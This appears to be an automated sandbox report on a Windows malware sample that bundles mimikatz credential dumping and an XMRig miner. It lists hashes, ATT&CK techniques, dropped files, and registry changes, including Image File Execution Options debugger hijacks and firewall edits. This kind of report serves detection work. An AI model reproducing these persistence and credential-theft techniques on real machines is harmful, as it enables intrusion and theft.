mimikatz | 62469030dd50568e4c0df1dfe4544fd77b7522f5b3713f665eb720585f291cdb

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2024 10:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
Size

9.3MB
MD5

6db10941c1ec9d38230a91e2c461d74e
SHA1

584446d15ecc12fa4e2c438ae52c299de0dafe8e
SHA256

62469030dd50568e4c0df1dfe4544fd77b7522f5b3713f665eb720585f291cdb
SHA512

c67ece8eab5389e39d5f63e63287f4f726e0785265a2813564e3907cb455d2cbd871b2d98f2b1b60248a659e6c107fe223ace99e0d965b60b4f98276600dfc52
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig credential_access discovery evasion execution miner persistence privilege_escalation upx

Malware Config

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

pyismeq.exe

description	pid	Process	procid_target
PID 1448 created 1692	1448	pyismeq.exe	37

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (21188) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
credential_access

LSASS Memory
T1003.001

XMRig Miner payload 10 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1700-177-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-181-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-199-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-211-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-224-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-235-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-249-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-256-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-277-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig
behavioral2/memory/1700-387-0x00007FF642810000-0x00007FF642930000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3004-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/3004-4-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/files/0x0007000000023459-6.dat	mimikatz
behavioral2/memory/4992-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral2/memory/4692-136-0x00007FF6F8E00000-0x00007FF6F8EEE000-memory.dmp	mimikatz
behavioral2/memory/4692-138-0x00007FF6F8E00000-0x00007FF6F8EEE000-memory.dmp	mimikatz

Drops file in Drivers directory 3 IoCs

Processes:

pyismeq.exewpcap.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	pyismeq.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	pyismeq.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

pyismeq.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	pyismeq.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	pyismeq.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exe

pid	Process
1560	netsh.exe
3524	netsh.exe

Executes dropped EXE 29 IoCs

Processes:

pyismeq.exepyismeq.exewpcap.exevinqltqet.exevfshost.exexohudmc.exepujbqc.exeeyifeiqae.exefsfese.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exepyismeq.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exeeyifeiqae.exebbsetityz.exepyismeq.exe

pid	Process
4992	pyismeq.exe
1448	pyismeq.exe
4056	wpcap.exe
4792	vinqltqet.exe
4692	vfshost.exe
3088	xohudmc.exe
1476	pujbqc.exe
2904	eyifeiqae.exe
1700	fsfese.exe
1400	eyifeiqae.exe
2324	eyifeiqae.exe
2916	eyifeiqae.exe
3432	eyifeiqae.exe
4764	eyifeiqae.exe
2240	eyifeiqae.exe
4596	eyifeiqae.exe
2288	eyifeiqae.exe
1748	eyifeiqae.exe
1656	eyifeiqae.exe
4384	eyifeiqae.exe
2788	eyifeiqae.exe
4708	pyismeq.exe
1080	eyifeiqae.exe
1672	eyifeiqae.exe
4720	eyifeiqae.exe
2712	eyifeiqae.exe
528	eyifeiqae.exe
2296	bbsetityz.exe
220	pyismeq.exe

Loads dropped DLL 12 IoCs

Processes:

wpcap.exevinqltqet.exe

pid	Process
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4056	wpcap.exe
4792	vinqltqet.exe
4792	vinqltqet.exe
4792	vinqltqet.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
76	ifconfig.me
77	ifconfig.me

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Creates a Windows Service
persistence

Drops file in System32 directory 18 IoCs

Processes:

pyismeq.exewpcap.exexohudmc.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE	pyismeq.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\pujbqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	pyismeq.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\pujbqc.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	pyismeq.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	pyismeq.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	pyismeq.exe

UPX packed file 35 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4692-136-0x00007FF6F8E00000-0x00007FF6F8EEE000-memory.dmp	upx
behavioral2/files/0x00070000000234ae-135.dat	upx
behavioral2/memory/4692-138-0x00007FF6F8E00000-0x00007FF6F8EEE000-memory.dmp	upx
behavioral2/files/0x00070000000234b9-155.dat	upx
behavioral2/memory/2904-156-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/2904-159-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-164-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/files/0x00070000000234b6-163.dat	upx
behavioral2/memory/1400-170-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/2324-174-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-177-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/2916-179-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-181-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/3432-184-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/4764-188-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/2240-192-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/4596-196-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-199-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/2288-201-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1748-205-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1656-209-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-211-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/4384-214-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/2788-220-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-224-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/1080-227-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1672-230-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/4720-232-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/2712-234-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-235-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/528-237-0x00007FF7E77B0000-0x00007FF7E780B000-memory.dmp	upx
behavioral2/memory/1700-249-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/1700-256-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/1700-277-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx
behavioral2/memory/1700-387-0x00007FF642810000-0x00007FF642930000-memory.dmp	upx

Drops file in Program Files directory 3 IoCs

Processes:

wpcap.exe

description	ioc	Process
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

Processes:

pyismeq.exebbsetityz.exe2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.execmd.exe

description	ioc	Process
File created	C:\Windows\mvibprbre\UnattendGC\AppCapture32.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\schoedcl.xml	pyismeq.exe
File created	C:\Windows\nfbznfkt\schoedcl.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\vimpcsvc.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\upbdrjv\swrpwe.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\vinqltqet.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\spoolsrv.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\tibe-2.dll	pyismeq.exe
File created	C:\Windows\nfbznfkt\svschost.xml	pyismeq.exe
File created	C:\Windows\nfbznfkt\docmicfg.xml	pyismeq.exe
File opened for modification	C:\Windows\mvibprbre\meetrtrln\Packet.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\coli-0.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\schoedcl.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\docmicfg.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\wpcap.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\zlib1.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\spoolsrv.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\AppCapture64.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\cnli-1.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\svschost.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\Corporate\mimilib.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\ip.txt	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\trfo-2.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\ucl.dll	pyismeq.exe
File created	C:\Windows\nfbznfkt\vimpcsvc.xml	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\svschost.xml	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\docmicfg.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\Corporate\mimidrv.sys	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\bbsetityz.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\exma-1.dll	pyismeq.exe
File opened for modification	C:\Windows\mvibprbre\meetrtrln\Result.txt	bbsetityz.exe
File created	C:\Windows\mvibprbre\UnattendGC\schoedcl.xml	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\vimpcsvc.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\Corporate\vfshost.exe	pyismeq.exe
File created	C:\Windows\ime\pyismeq.exe	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\pyismeq.exe	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\mvibprbre\meetrtrln\Packet.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\vimpcsvc.exe	pyismeq.exe
File opened for modification	C:\Windows\mvibprbre\Corporate\log.txt	cmd.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\libeay32.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\trch-1.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\docmicfg.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\scan.bat	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\ssleay32.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\spoolsrv.exe	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\schoedcl.xml	pyismeq.exe
File created	C:\Windows\nfbznfkt\pyismeq.exe	2024-09-27_6db10941c1ec9d38230a91e2c461d74e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\crli-0.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\tucl-1.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\svschost.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\xdvl-0.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\docmicfg.exe	pyismeq.exe
File created	C:\Windows\mvibprbre\meetrtrln\wpcap.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\libxml2.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\svschost.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\Shellcode.ini	pyismeq.exe
File created	C:\Windows\nfbznfkt\spoolsrv.xml	pyismeq.exe
File opened for modification	C:\Windows\nfbznfkt\spoolsrv.xml	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\specials\posh-0.dll	pyismeq.exe
File created	C:\Windows\mvibprbre\UnattendGC\vimpcsvc.xml	pyismeq.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
4592	sc.exe
1060	sc.exe
1720	sc.exe
1596	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
